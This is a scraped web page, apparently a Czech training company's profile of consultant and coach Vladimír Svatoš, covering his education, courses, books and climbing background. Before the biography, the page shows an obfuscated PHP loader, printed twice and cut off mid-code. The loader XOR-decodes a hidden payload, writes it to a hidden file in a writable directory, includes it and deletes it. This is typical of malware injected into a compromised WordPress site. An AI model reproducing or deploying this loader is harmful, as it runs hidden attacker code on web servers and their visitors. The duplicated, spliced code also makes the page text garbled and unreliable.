100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Vladimír Svatoš - AKORD OT
  • působí jako konzultant, kouč a lektor kurzů manažerského rozvoje (vedení lidí, koučování, týmová spolupráce, komunikační a prezentační dovednosti, řešení konfliktů, vyjednávání a budování osobní značky)
  • také jako facilitátor strategických workshopů, poradce v oblasti vedení lidí, řešení konfliktů na pracovišti, hodnocení zaměstnanců…
  • vystudoval FTVS UK v Praze
  • absolvoval dvouletý distanční kurz pro trenéry managementu na Johns Hopkins University v Baltimore
  • absolvoval odborné stáže v oblasti outdoor management training v Outward Bound ve Velké Británii
  • má dlouholetou vlastní manažerskou praxi (vedoucí katedry, výkonný ředitel vzdělávací společnosti)
  • externě vyučuje komunikaci, skupinovou dynamiku a outdoor management training na UJEP
  • je autorem v roce 2015 vydané knihy Jak působit na druhé, aby vám šli na ruku a, spolu s Petrem Lebedou, knihy Outdoor trénink pro manažery a firemní týmy
  • v minulosti byl předsedou horolezeckého oddílu, horolezeckým instruktorem a vedoucím několika lezeckých výprav
  • je stále aktivním lyžařem, cyklistou a horolezcem, milovníkem Českého ráje

Vladimíra najdete na: